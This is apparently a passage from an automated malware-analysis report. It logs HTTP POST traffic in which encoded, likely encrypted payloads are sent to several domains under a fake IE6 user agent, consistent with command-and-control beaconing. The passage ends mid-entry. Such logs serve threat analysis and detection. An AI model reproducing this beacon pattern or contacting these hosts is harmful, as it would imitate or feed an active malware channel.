RVBUX0xBTkdVQUdFIjoiZW4tdXMiLCJDT05URU5UX1RZUEUiOiJhcHBsaWNhdGlvblwvb2N0ZXQtc3RyZWFtIiwiSFRUUF9VU0VSX0FHRU5UIjoiTW96aWxsYVwvNC4wIChjb21wYXRpYmxlOyBNU0lFIDYuMDsgV2luZG93cyBOVCA1LjE7IFNWMSkiLCJIVFRQX0NBQ0hFX0NPTlRST0wiOiJuby1jYWNoZSIsIlJFTU9URV9BRERSIjoiODQuMTcuNTIuNDMiLCJSRVFVRVNUX1NDSEVNRSI6Imh0dHAiLCJDT05URVhUX1BSRUZJWCI6Ilwvc3lzdGVtLWJpblwvIiwiQ09OVEVYVF9ET0NVTUVOVF9ST09UIjoiXC9rdW5kZW5cL3VzclwvbGliXC9jZ2ktYmluXC8iLCJSRU1PVEVfUE9SVCI6IjU4OTQ0IiwiUkVESVJFQ1RfVVJMIjoiXC9pbmRleC5waHAiLCJSRVFVRVNUX01FVEhPRCI6IlBPU1QiLCJRVUVSWV9TVFJJTkciOiIiLCJTQ1JJUFRfTkFNRSI6IlwvaW5kZXgucGhwIiwiU1RBVFVTIjoiMjAwIiwiT1JJR19QQVRIX0lORk8iOiJcL2luZGV4LnBocCIsIk9SSUdfUEFUSF9UUkFOU0xBVEVEIjoiXC9rdW5kZW5cL2hvbWVwYWdlc1wvOVwvZDMyODE1MTg0N1wvaHRkb2NzXC9jbGlja2FuZGJ1aWxkc1wvbXlyb3BjYlwvaW5kZXgucGhwIiwiUEhQX1NFTEYiOiJcL2luZGV4LnBocCIsIlJFUVVFU1RfVElNRV9GTE9BVCI6MTY5MDQ4Njk4Mi4xMDg0NzUsIlJFUVVFU1RfVElNRSI6MTY5MDQ4Njk4MiwiYXJndiI6W10sImFyZ2MiOjB9; myro_ct=eyJ1cmwiOiIiLCJpcCI6Ijg0LjE3LjUyLjQzIn0%3D; shield-notbot-nonce=6077383c26
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.11tochi.netCache-Control: no-cacheData Raw: 31 51 45 70 5a 58 52 36 65 41 2b 72 71 75 72 6d 7a 32 4f 72 2b 38 65 74 4f 76 39 73 72 4d 69 2b 36 50 36 4a 47 55 4d 6e 67 51 56 69 54 42 43 6e 6c 46 45 71 52 55 45 61 6f 58 5a 57 6d 73 49 4a 62 53 63 2b 44 67 72 73 36 4d 43 69 75 79 30 70 75 6f 6c 47 57 55 6d 68 34 65 6b 58 6a 59 61 47 55 4f 57 34 59 58 30 33 4a 61 4c 5a 38 6e 68 4f 36 5a 6f 47 4f 39 6c 6f 42 75 2b 2b 36 71 57 6a 4e 50 39 31 42 59 59 58 36 6a 34 4d 4e 7a 72 37 2f 66 6c 33 53 34 45 30 52 5a 41 2f 64 4d 67 47 2b 4e 34 63 57 57 70 67 66 65 32 4c 64 38 62 6b 6e 77 38 2f 64 71 77 41 6b 59 79 45 4c 4a 38 58 64 37 36 6e 38 55 47 6a 44 6f 66 4d 78 36 72 34 44 4c 6b 5a 62 62 79 71 38 53 39 49 45 4a 4d 53 41 68 6d 4f 47 72 42 79 79 45 78 31 39 6d 34 70 6e 4b 61 30 2b 39 4b 78 51 69 71 66 6b 61 43 57 48 36 75 5a 2f 71 64 41 4f 34 2f 44 75 56 2f 55 77 55 6e 6a 69 79 37 61 72 64 6a 72 78 58 30 33 58 64 42 65 50 66 75 74 64 6c 44 31 6d 47 72 76 6e 46 39 68 75 48 74 2f 31 56 6f 42 6f 44 32 4c 72 6c 6a 70 76 50 45 4a 61 37 76 4d 4a 33 76 49 33 76 2b 32 71 52 48 59 55 73 43 66 4c 34 52 65 43 59 45 44 6e 38 7a 4a 46 78 41 4e 49 33 36 6a 6b 6a 2f 52 58 36 52 55 44 41 36 78 32 2f 61 58 42 54 49 62 68 5a 39 57 52 67 77 2f 78 63 68 31 43 37 44 41 55 48 63 72 52 7a 31 5a 34 61 39 35 5a 31 6d 51 64 4d 76 36 36 59 76 42 67 42 44 67 34 35 48 72 76 6c 6b 69 73 32 33 72 61 44 54 6a 33 2b 4d 35 57 4e 75 61 4a 4d 2f 57 6b 33 67 6c 2b 38 4a 30 48 56 49 79 54 30 4c 54 4d 4e 54 2f 44 33 41 6f 37 71 30 31 4c 4e 41 47 6b 6b 71 62 78 34 4b 57 54 55 69 77 68 6d 61 75 56 4c 48 53 43 49 63 6e 6f 43 66 38 30 70 41 6f 39 6b 66 55 2f 62 46 4f 45 30 43 75 Data Ascii: 1QEpZXR6eA+rqurmz2Or+8etOv9srMi+6P6JGUMngQViTBCnlFEqRUEaoXZWmsIJbSc+Dgrs6MCiuy0puolGWUmh4ekXjYaGUOW4YX03JaLZ8nhO6ZoGO9loBu++6qWjNP91BYYX6j4MNzr7/fl3S4E0RZA/dMgG+N4cWWpgfe2Ld8bknw8/dqwAkYyELJ8Xd76n8UGjDofMx6r4DLkZbbyq8S9IEJMSAhmOGrByyEx19m4pnKa0+9KxQiqfkaCWH6uZ/qdAO4/DuV/UwUnjiy7ardjrxX03XdBePfutdlD1mGrvnF9huHt/1VoBoD2LrljpvPEJa7vMJ3vI3v+2qRHYUsCfL4ReCYEDn8zJFxANI36jkj/RX6RUDA6x2/aXBTIbhZ9WRgw/xch1C7DAUHcrRz1Z4a95Z1mQdMv66YvBgBDg45Hrvlkis23raDTj3+M5WNuaJM/Wk3gl+8J0HVIyT0LTMNT/D3Ao7q01LNAGkkqbx4KWTUiwhmauVLHSCIcnoCf80pAo9kfU/bFOE0Cu
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pb-games.comCache-Control: no-cacheData Raw: 30 6d 61 63 52 38 4c 46 6d 41 2f 6f 59 55 32 2f 74 55 72 75 4e 55 56 73 72 43 72 53 7a 4d 50 66 46 73 43 6c 70 54 38 4f 74 79 58 61 34 79 41 56 76 39 67 55 4f 77 38 67 46 6a 64 57 68 4a 70 6c 37 67 36 30 34 4f 55 6b 51 46 53 33 33 6a 4a 4c 50 37 53 5a 77 2b 72 59 36 4e 67 58 62 7a 77 57 61 62 68 65 58 2f 79 7a 47 64 47 76 4e 45 41 77 66 30 41 4e 4f 46 38 61 31 7a 77 57 77 78 45 4d 63 61 75 57 31 43 4a 4a 51 6b 79 63 48 57 63 48 56 58 4a 74 58 42 4b 63 32 6f 50 73 54 6f 6d 4b 35 75 6f 54 64 72 72 37 51 76 7a 54 6d 63 2f 58 32 4e 30 54 32 64 6f 67 77 4e 36 44 6c 33 31 73 62 41 4a 48 6f 47 53 52 67 47 63 65 76 4a 45 59 78 41 39 38 6f 69 6e 34 35 6d 2f 4c 33 38 7a 77 37 4b 52 6c 2b 73 74 61 73 75 70 68 55 45 6c 30 54 4d 5a 38 63 30 2b 67 2f 77 6d 79 6b 6c 66 42 2b 4c 41 54 47 68 6e 2f 34 4c 68 46 52 7a 2b 6d 30 4a 71 59 4e 36 61 30 34 4b 2b 6e 55 53 77 73 50 79 67 31 71 6d 68 38 38 4d 58 49 6b 52 52 53 47 63 46 55 48 36 34 72 72 75 7a 78 72 4e 4a 36 7a 6f 4b 61 6b 66 4b 47 5a 56 7a 45 6a 43 4a 52 44 66 35 65 45 55 5a 67 43 52 4a 69 71 56 48 64 4e 36 7a 43 51 67 64 66 62 2b 72 5a 75 2f 66 73 43 4d 59 79 62 37 65 67 44 7a 37 58 74 68 52 4b 32 55 4c 70 78 32 6a 76 47 68 48 62 35 48 75 6b 36 53 45 6d 4d 48 44 75 31 69 39 62 30 38 4f 35 70 6b 57 72 62 66 35 67 52 52 5a 46 4c 56 48 6e 36 57 4a 43 4e 37 41 49 4b 4d 36 79 47 54 73 69 45 6f 44 34 54 53 30 6a 52 78 5a 65 57 7a 48 76 75 63 62 61 66 58 50 59 57 75 54 55 5a 53 41 4d 66 74 35 4a 7a 45 58 4d 37 74 66 44 71 62 62 6e 44 54 57 42 30 6a 47 64 58 58 4c 5a 5a 6d 73 61 38 45 59 72 33 54 50 4e 57 65 54 4a 53 61 78 51 54 75 6d 57 57 6b 65 51 6b 62 75 49 53 36 35 6a Data Ascii: 0macR8LFmA/oYU2/tUruNUVsrCrSzMPfFsClpT8OtyXa4yAVv9gUOw8gFjdWhJpl7g604OUkQFS33jJLP7SZw+rY6NgXbzwWabheX/yzGdGvNEAwf0ANOF8a1zwWwxEMcauW1CJJQkycHWcHVXJtXBKc2oPsTomK5uoTdrr7QvzTmc/X2N0T2dogwN6Dl31sbAJHoGSRgGcevJEYxA98oin45m/L38zw7KRl+stasuphUEl0TMZ8c0+g/wmyklfB+LATGhn/4LhFRz+m0JqYN6a04K+nUSwsPyg1qmh88MXIkRRSGcFUH64rruzxrNJ6zoKakfKGZVzEjCJRDf5eEUZgCRJiqVHdN6zCQgdfb+rZu/fsCMYyb7egDz7XthRK2ULpx2jvGhHb5Huk6SEmMHDu1i9b08O5pkWrbf5gRRZFLVHn6WJCN7AIKM6yGTsiEoD4TS0jRxZeWzHvucbafXPYWuTUZSAMft5JzEXM7tfDqbbnDTWB0jGdXXLZZmsa8EYr3TPNWeTJSaxQTumWWkeQkbuIS65j
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pb-games.comCache-Control: no-cacheData Raw: 30 6d 61 63 52 38 4c 46 6d 41 2f 6f 59 55 32 2f 74 55 72 75 4e 55 56 73 72 43 72 53 7a 4d 50 66 46 73 43 6c 70 54 38 4f 74 79 58 61 34 79 41 56 76 39 67 55 4f 77 38 67 46 6a 64 57 68 4a 70 6c 37 67 36 30 34 4f 55 6b 51 46 53 33 33 6a 4a 4c 50 37 53 5a 77 2b 72 59 36 4e 67 58 62 7a 77 57 61 62 68 65 58 2f 79 7a 47 64 47 76 4e 45 41 77 66 30 41 4e 4f 46 38 61 31 7a 77 57 77 78 45 4d 63 61 75 57 31 43 4a 4a 51 6b 79 63 48 57 63 48 56 58 4a 74 58 42 4b 63 32 6f 50 73 54 6f 6d 4b 35 75 6f 54 64 72 72 37 51 76 7a 54 6d 63 2f 58 32 4e 30 54 32 64 6f 67 77 4e 36 44 6c 33 31 73 62 41 4a 48 6f 47 53 52 67 47 63 65 76 4a 45 59 78 41 39 38 6f 69 6e 34 35 6d 2f 4c 33 38 7a 77 37 4b 52 6c 2b 73 74 61 73 75 70 68 55 45 6c 30 54 4d 5a 38 63 30 2b 67 2f 77 6d 79 6b 6c 66 42 2b 4c 41 54 47 68 6e 2f 34 4c 68 46 52 7a 2b 6d 30 4a 71 59 4e 36 61 30 34 4b 2b 6e 55 53 77 73 50 79 67 31 71 6d 68 38 38 4d 58 49 6b 52 52 53 47 63 46 55 48 36 34 72 72 75 7a 78 72 4e 4a 36 7a 6f 4b 61 6b 66 4b 47 5a 56 7a 45 6a 43 4a 52 44 66 35 65 45 55 5a 67 43 52 4a 69 71 56 48 64 4e 36 7a 43 51 67 64 66 62 2b 72 5a 75 2f 66 73 43 4d 59 79 62 37 65 67 44 7a 37 58 74 68 52 4b 32 55 4c 70 78 32 6a 76 47 68 48 62 35 48 75 6b 36 53 45 6d 4d 48 44 75 31 69 39 62 30 38 4f 35 70 6b 57 72 62 66 35 67 52 52 5a 46 4c 56 48 6e 36 57 4a 43 4e 37 41 49 4b 4d 36 79 47 54 73 69 45 6f 44 34 54 53 30 6a 52 78 5a 65 57 7a 48 76 75 63 62 61 66 58 50 59 57 75 54 55 5a 53 41 4d 66 74 35 4a 7a 45 58 4d 37 74 66 44 71 62 62 6e 44 54 57 42 30 6a 47 64 58 58 4c 5a 5a 6d 73 61 38 45 59 72 33 54 50 4e 57 65 54 4a 53 61 78 51 54 75 6d 57 57 6b 65 51 6b 62 75 49 53 36 35 6a Data Ascii: 0macR8LFmA/oYU2/tUruNUVsrCrSzMPfFsClpT8OtyXa4yAVv9gUOw8gFjdWhJpl7g604OUkQFS33jJLP7SZw+rY6NgXbzwWabheX/yzGdGvNEAwf0ANOF8a1zwWwxEMcauW1CJJQkycHWcHVXJtXBKc2oPsTomK5uoTdrr7QvzTmc/X2N0T2dogwN6Dl31sbAJHoGSRgGcevJEYxA98oin45m/L38zw7KRl+stasuphUEl0TMZ8c0+g/wmyklfB+LATGhn/4LhFRz+m0JqYN6a04K+nUSwsPyg1qmh88MXIkRRSGcFUH64rruzxrNJ6zoKakfKGZVzEjCJRDf5eEUZgCRJiqVHdN6zCQgdfb+rZu/fsCMYyb7egDz7XthRK2ULpx2jvGhHb5Huk6SEmMHDu1i9b08O5pkWrbf5gRRZFLVHn6WJCN7AIKM6yGTsiEoD4TS0jRxZeWzHvucbafXPYWuTUZSAMft5JzEXM7tfDqbbnDTWB0jGdXXLZZmsa8EYr3TPNWeTJSaxQTumWWkeQkbuIS65j
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yoruksut.comCache-Control: no-cacheData Raw: 7a 42 73 6c 73 75 54 62 72 41 2f 64 61 50 52 41 66 2f 55 57 59 62 64 41 55 31 57 63 73 67 4e 43 57 44 38 51 65 65 31 34 42 61 78 54 4e 56 70 71 51 43 31 68 52 38 4a 6c 6b 75 4f 49 58 72 70 6f 65 78 64 57 62 74 46 56 73 46 4d 44 42 62 2f 33 6d 75 59 6e 6d 56 59 42 6a 59 71 42 49 38 51 57 6b 45 77 61 6c 47 34 33 4e 4f 63 68 74 35 6e 46 49 76 67 74 77 6a 42 62 74 61 6a 6e 75 31 2f 5a 6b 6f 5a 6c 77 4a 59 49 43 42 79 52 5a 37 71 53 4c 6c 64 75 79 70 70 4a 54 55 71 69 55 68 41 52 46 6a 41 49 30 5a 4d 34 37 42 4a 48 51 31 31 48 67 41 71 70 73 34 6a 4b 31 54 48 74 4c 76 32 67 54 72 2f 69 64 45 52 4a 4f 37 46 66 51 56 74 4a 58 4a 39 57 31 49 4a 34 44 2f 53 58 69 42 78 4a 6c 47 53 45 54 76 39 48 42 68 6e 2b 43 32 69 68 55 69 35 30 6b 45 43 65 50 46 45 54 33 4e 30 53 63 54 78 37 69 63 63 4c 69 4e 5a 78 6a 77 57 32 76 43 54 50 54 5a 50 78 46 77 4a 67 67 51 32 6c 4a 56 6b 54 75 61 79 71 75 48 39 59 37 69 33 75 4a 73 2b 78 2f 68 75 57 6b 36 6f 55 52 34 63 44 4b 34 7a 59 61 49 58 61 44 72 30 77 44 64 6e 32 44 51 2f 46 69 64 76 6d 41 57 4d 64 54 2f 6a 33 6f 6d 65 6c 6f 50 32 6f 4e 31 61 4c 62 6a 36 4a 31 78 75 43 62 77 35 55 71 6a 52 41 6c 71 54 2b 69 4f 61 66 4e 33 79 49 6e 6f 55 30 4c 34 50 33 49 78 7a 45 6f 47 78 59 63 54 6e 64 47 31 6e 69 54 65 66 35 62 67 67 38 31 6f 73 78 76 41 55 74 58 31 47 58 4c 6b 64 4d 63 63 38 6d 37 61 63 44 44 70 57 49 74 39 4f 49 36 65 43 36 32 65 73 4c 69 71 75 4a 4c 39 2f 50 4f 55 69 7a 32 42 4d 6f 6a 39 50 39 33 38 34 62 2b 54 39 68 48 31 32 2f 34 77 37 4b 6f 74 31 46 4c 77 78 75 73 48 70 2b 47 58 79 5a 67 74 69 7a 70 41 4e 4e 34 65 4c 39 50 65 4d 44 36 6a 33 4d 33 47 6a 5a 4a 35 7a 41 6c 41 31 6e 57 31 36 39 6e 34 71 57 53 39 4e 6b 5a 43 6c 43 72 45 44 71 46 6c 6a 6a 33 67 52 70 30 51 4f 33 59 61 66 6a 7a 68 59 3d Data Ascii: zBslsuTbrA/daPRAf/UWYbdAU1WcsgNCWD8Qee14BaxTNVpqQC1hR8JlkuOIXrpoexdWbtFVsFMDBb/3muYnmVYBjYqBI8QWkEwalG43NOcht5nFIvgtwjBbtajnu1/ZkoZlwJYICByRZ7qSLlduyppJTUqiUhARFjAI0ZM47BJHQ11HgAqps4jK1THtLv2gTr/idERJO7FfQVtJXJ9W1IJ4D/SXiBxJlGSETv9HBhn+C2ihUi50kECePFET3N0ScTx7iccLiNZxjwW2vCTPTZPxFwJggQ2lJVkTuayquH9Y7i3uJs+x/huWk6oUR4cDK4zYaIXaDr0wDdn2DQ/FidvmAWMdT/j3omeloP2oN1aLbj6J1xuCbw5UqjRAlqT+iOafN3yInoU0L4P3IxzEoGxYcTndG1niTef5bgg81osxvAUtX1GXLkdMcc8m7acDDpWIt9OI6eC62esLiquJL9/POUiz2BMoj9P9384b+T9hH12/4w7Kot1FLwxusHp+GXyZgtizpANN4eL9PeMD6j3M3GjZJ5zAlA1nW169n4qWS9NkZClCrEDqFljj3gRp0QO3YafjzhY=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sclover3.comCache-Control: no-cacheData Raw: 4c 4b 2b 55 37 55 4d 61 74 77 39 62 34 4a 4a 62 53 76 71 38 6a 57 79 52 53 44 6a 70 74 59 42 6f 4a 77 77 4d 6a 78 38 4f 2b 48 57 44 62 2f 38 53 69 46 54 65 6a 45 46 58 32 57 41 41 64 6d 41 46 4f 49 58 53 46 53 53 35 42 5a 38 6d 69 71 6f 39 32 45 61 36 63 73 67 35 54 75 34 51 67 43 63 75 54 4c 70 38 54 4c 7a 49 48 4b 58 5a 67 4a 71 70 31 7a 44 33 6d 69 72 39 73 72 38 42 78 34 6e 71 6f 39 67 2f 61 48 78 37 6e 53 73 4e 74 37 73 4f 2f 79 32 70 77 32 4a 6a 57 2b 55 48 6d 6e 2f 39 4f 6e 59 73 58 43 51 4f 70 39 69 53 55 41 32 51 67 42 31 37 39 65 52 2f 50 33 74 53 78 33 75 6f 6c 39 7a 78 50 55 39 38 4a 35 43 6a 78 78 70 56 2b 6b 46 43 37 78 74 7a 7a 78 64 2b 50 30 38 77 52 55 32 53 58 36 4c 61 56 52 75 66 7a 47 6c 46 35 36 51 4a 34 4c 54 70 55 55 62 2b 79 56 33 43 59 73 4b 54 36 66 67 53 53 45 55 47 54 42 2f 36 44 72 4e 45 6a 4e 44 76 4a 32 5a 41 66 6b 35 54 4b 33 6b 63 6f 56 62 6d 48 68 6e 68 73 72 36 33 6e 65 2b 4e 53 7a 33 76 6d 76 67 50 66 2b 34 65 48 45 31 73 39 5a 48 57 4f 61 75 64 6a 51 65 42 6b 57 35 4c 35 33 7a 33 51 42 6c 50 46 59 61 6a 68 42 70 64 38 6f 54 48 57 51 73 48 66 78 63 63 63 66 44 34 4b 73 4b 34 50 4d 67 69 33 79 61 42 55 58 75 34 75 6f 4f 4e 31 72 31 37 69 6e 33 58 45 2b 5a 55 41 65 59 76 2b 74 75 51 6c 66 77 65 66 45 61 33 2b 46 6e 37 69 39 75 6c 73 74 58 67 34 66 54 33 37 2b 42 71 59 31 61 48 5a 75 4b 4d 5a 45 47 67 75 64 70 76 6b 45 58 34 52 2b 51 2f 54 77 35 4c 58 70 49 64 57 75 47 38 71 77 6e 4c 66 52 33 70 43 2f 53 30 51 4d 57 76 35 77 55 77 73 61 2f 4a 4a 59 64 6f 4f 57 2b 4f 79 38 6f 57 77 6a 55 78 7a 68 48 6f 34 34 62 64 36 61 6f 44 51 67 4f 56 76 4a 4e 5a 4b 75 68 49 2f 32 6a 53 76 36 6b 50 6f 72 42 6e 4a 37 6f 44 75 76 47 4a 59 49 4b 49 45 38 72 62 45 37 5a 4c 65 55 68 53 5a 2b 37 32 6b 66 37 70 Data Ascii: LK+U7UMatw9b4JJbSvq8jWyRSDjptYBoJwwMjx8O+HWDb/8SiFTejEFX2WAAdmAFOIXSFSS5BZ8miqo92Ea6csg5Tu4QgCcuTLp8TLzIHKXZgJqp1zD3mir9sr8Bx4nqo9g/aHx7nSsNt7sO/y2pw2JjW+UHmn/9OnYsXCQOp9iSUA2QgB179eR/P3tSx3uol9zxPU98J5CjxxpV+kFC7xtzzxd+P08wRU2SX6LaVRufzGlF56QJ4LTpUUb+yV3CYsKT6fgSSEUGTB/6DrNEjNDvJ2ZAfk5TK3kcoVbmHhnhsr63ne+NSz3vmvgPf+4eHE1s9ZHWOaudjQeBkW5L53z3QBlPFYajhBpd8oTHWQsHfxcccfD4KsK4PMgi3yaBUXu4uoON1r17in3XE+ZUAeYv+tuQlfwefEa3+Fn7i9ulstXg4fT37+BqY1aHZuKMZEGgudpvkEX4R+Q/Tw5LXpIdWuG8qwnLfR3pC/S0QMWv5wUwsa/JJYdoOW+Oy8oWwjUxzhHo44bd6aoDQgOVvJNZKuhI/2jSv6kPorBnJ7oDuvGJYIKIE8rbE7ZLeUhSZ+72kf7p
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 63 64 62 2f 2f 4b 4c 6a 5a 74 65 70 75 4c 47 46 46 51 34 74 5a 69 57 6c 65 73 30 79 6f 4d 58 63 39 73 73 35 7a 53 49 6e 41 4a 48 39 75 75 73 51 4c 6d 65 6b 73 47 41 63 7a 6f 45 47 37 65 75 43 7a 6c 45 73 52 38 35 59 72 78 4a 6b 74 4e 68 4e 33 67 4b 4f 33 36 39 71 42 31 34 5a 37 45 38 70 41 74 65 51 75 4e 7a 55 6a 45 71 68 39 4b 34 42 6e 6e 64 76 58 32 44 2b 38 34 79 34 4d 77 64 32 2f 53 2b 37 56 6f 7a 77 4d 63 47 77 4e 67 6f 55 43 42 78 54 50 52 6d 45 34 4f 6a 65 2b 6b 30 72 64 6d 36 4e 56 75 4a 4d 79 2f 47 49 6d 70 76 4c 61 52 48 4b 61 65 68 75 42 69 38 4e 78 42 71 62 2b 70 58 75 46 72 33 70 55 43 7a 45 6c 46 4b 38 39 51 31 75 51 70 49 4c 44 67 6c 77 6c 74 63 31 56 66 62 75 79 75 34 45 76 74 30 58 73 49 2f 34 77 6a 31 35 43 50 42 32 30 77 62 75 46 32 30 52 4e 34 4e 6d 65 53 59 74 6b 47 74 43 34 68 52 6f 46 76 75 54 6e 70 69 39 76 77 39 45 50 31 78 61 6a 35 32 36 4a 34 74 6a 4b 45 71 77 4d 43 49 50 53 56 42 55 78 74 74 2f 38 63 59 61 6c 66 4f 53 39 68 49 72 31 6b 78 77 4f 6d 50 58 31 4a 6a 69 32 6b 72 45 72 7a 77 51 48 79 4b 6c 49 30 42 6a 6a 6c 6b 2f 58 77 64 4e 63 79 45 76 71 51 39 6e 4c 4a 65 41 65 50 63 57 63 62 6f 4a 66 51 6e 42 32 46 64 4c 39 45 50 42 54 6f 78 57 2f 73 51 52 6d 31 32 4f 4f 32 2f 75 51 73 54 33 61 55 36 74 7a 55 72 61 71 79 73 63 49 6d 79 53 57 53 6f 37 78 6e 52 53 38 79 35 35 64 53 4a 61 65 64 49 65 68 68 51 52 47 64 4d 39 52 65 53 52 56 71 67 73 32 68 4f 35 76 66 4d 64 33 50 48 6a 52 5a 44 32 7a 50 4d 33 6a 41 35 6b 77 70 66 47 34 67 71 74 37 51 57 2b 47 58 33 2b 4b 4a 4e 56 49 67 2f 37 34 44 4e 62 70 54 42 6b 70 4d 58 44 72 47 43 63 34 62 64 37 2b 76 35 46 61 4b 44 43 74 5a 51 77 76 53 39 66 63 30 59 3d Data Ascii: cdb//KLjZtepuLGFFQ4tZiWles0yoMXc9ss5zSInAJH9uusQLmeksGAczoEG7euCzlEsR85YrxJktNhN3gKO369qB14Z7E8pAteQuNzUjEqh9K4BnndvX2D+84y4Mwd2/S+7VozwMcGwNgoUCBxTPRmE4Oje+k0rdm6NVuJMy/GImpvLaRHKaehuBi8NxBqb+pXuFr3pUCzElFK89Q1uQpILDglwltc1Vfbuyu4Evt0XsI/4wj15CPB20wbuF20RN4NmeSYtkGtC4hRoFvuTnpi9vw9EP1xaj526J4tjKEqwMCIPSVBUxtt/8cYalfOS9hIr1kxwOmPX1Jji2krErzwQHyKlI0Bjjlk/XwdNcyEvqQ9nLJeAePcWcboJfQnB2FdL9EPBToxW/sQRm12OO2/uQsT3aU6tzUraqyscImySWSo7xnRS8y55dSJaedIehhQRGdM9ReSRVqgs2hO5vfMd3PHjRZD2zPM3jA5kwpfG4gqt7QW+GX3+KJNVIg/74DNbpTBkpMXDrGCc4bd7+v5FaKDCtZQwvS9fc0Y=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ftchat.comCache-Control: no-cacheData Raw: 43 54 2b 38 41 4b 67 43 5a 39 63 49 63 49 41 66 61 77 55 68 65 68 74 49 42 53 79 77 65 73 54 51 58 4d 67 66 79 58 59 42 44 48 54 4b 56 71 43 36 54 53 75 2b 37 62 43 30 2b 6d 79 32 4c 75 68 2f 45 55 77 44 71 4c 4f 77 4f 6a 65 75 61 56 6c 61 44 61 6b 75 36 77 50 72 77 69 5a 48 32 36 62 31 4e 4c 66 45 4e 67 59 58 64 6e 58 47 58 6a 64 7a 79 69 4f 75 77 65 69 42 67 6a 42 47 34 79 33 75 4e 72 76 76 56 52 62 75 50 70 6f 42 45 32 4b 43 42 30 4d 33 75 61 4b 66 4d 4c 48 76 30 4a 36 65 69 62 2b 72 30 67 30 49 34 39 47 76 61 38 7a 47 6f 47 35 46 2f 65 78 6c 6c 77 34 6d 67 36 49 4b 4c 6b 54 39 6d 2b 4a 38 64 47 33 51 65 56 46 2b 38 45 58 6c 4f 71 63 58 75 52 54 31 4d 66 72 70 44 69 6a 52 47 49 45 48 59 31 69 33 70 79 43 2f 50 65 37 4d 6c 53 38 64 54 49 51 6b 43 58 48 7a 70 6c 79 79 65 68 72 53 44 49 45 66 36 6a 67 5a 2f 58 68 57 51 49 55 38 38 2b 30 47 7a 2f 79 31 55 44 2b 4c 32 46 30 6b 6c 58 31 49 39 39 64 33 45 47 51 48 34 36 2b 59 4a 52 6d 52 66 56 30 52 4f 4f 5a 48 79 72 68 35 44 54 52 51 52 2b 35 4f 6d 69 61 51 30 70 62 59 56 6d 6a 71 39 37 2f 4e 33 34 70 38 46 51 4d 77 6e 6c 4f 59 6f 61 62 50 45 63 34 54 48 43 53 70 59 45 6d 61 4d 2f 59 4c 45 2b 53 47 49 30 4b 5a 33 78 77 57 75 43 4e 63 62 4b 7a 4e 55 78 55 67 78 34 4d 36 51 42 50 4d 41 54 63 43 78 6c 39 32 61 37 38 54 6c 66 76 73 34 39 6e 63 53 6a 4f 38 62 63 31 75 66 35 31 52 7a 30 55 71 43 6c 38 56 65 6b 66 6a 2b 38 6e 32 61 52 32 6a 62 48 35 62 64 2b 56 6b 47 35 2b 50 37 6f 4b 49 47 4c 55 4f 2f 4b 78 75 2f 71 31 65 59 4d 4e 64 64 63 37 32 63 32 4a 31 47 69 62 79 6f 73 4f 63 39 57 6c 4c 4d 59 39 49 53 75 6e 36 6a 48 33 67 57 73 71 6a 34 55 6d 51 31 4c 5a 68 2b 35 52 75 36 4a 2f 73 43 2b 74 63 56 58 63 73 59 42 67 44 35 46 54 50 Data Ascii: CT+8AKgCZ9cIcIAfawUhehtIBSywesTQXMgfyXYBDHTKVqC6TSu+7bC0+my2Luh/EUwDqLOwOjeuaVlaDaku6wPrwiZH26b1NLfENgYXdnXGXjdzyiOuweiBgjBG4y3uNrvvVRbuPpoBE2KCB0M3uaKfMLHv0J6eib+r0g0I49Gva8zGoG5F/exllw4mg6IKLkT9m+J8dG3QeVF+8EXlOqcXuRT1MfrpDijRGIEHY1i3pyC/Pe7MlS8dTIQkCXHzplyyehrSDIEf6jgZ/XhWQIU88+0Gz/y1UD+L2F0klX1I99d3EGQH46+YJRmRfV0ROOZHyrh5DTRQR+5OmiaQ0pbYVmjq97/N34p8FQMwnlOYoabPEc4THCSpYEmaM/YLE+SGI0KZ3xwWuCNcbKzNUxUgx4M6QBPMATcCxl92a78Tlfvs49ncSjO8bc1uf51Rz0UqCl8Vekfj+8n2aR2jbH5bd+VkG5+P7oKIGLUO/Kxu/q1eYMNddc72c2J1GibyosOc9WlLMY9ISun6jH3gWsqj4UmQ1LZh+5Ru6J/sC+tcVXcsYBgD5FTP
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jenco.co.ukCache-Control: no-cacheData Raw: 49 36 2f 7a 42 4c 51 6c 5a 39 64 6d 79 72 66 30 44 35 56 46 39 41 65 2f 56 50 65 73 6d 4b 49 45 4b 4c 35 2f 35 58 54 49 54 71 31 63 7a 4c 74 71 58 51 32 64 36 37 7a 39 6f 4f 62 37 62 6d 38 37 44 30 52 32 4f 76 78 39 45 76 4a 67 48 45 64 79 34 4a 7a 4c 57 30 53 62 2b 79 78 32 55 77 38 51 51 33 56 79 6d 70 34 47 34 4d 54 54 76 62 71 4a 52 68 63 63 4f 6c 36 4b 62 54 46 43 6e 34 42 44 30 42 79 64 4c 6a 4c 37 46 57 6f 6c 37 4f 6b 76 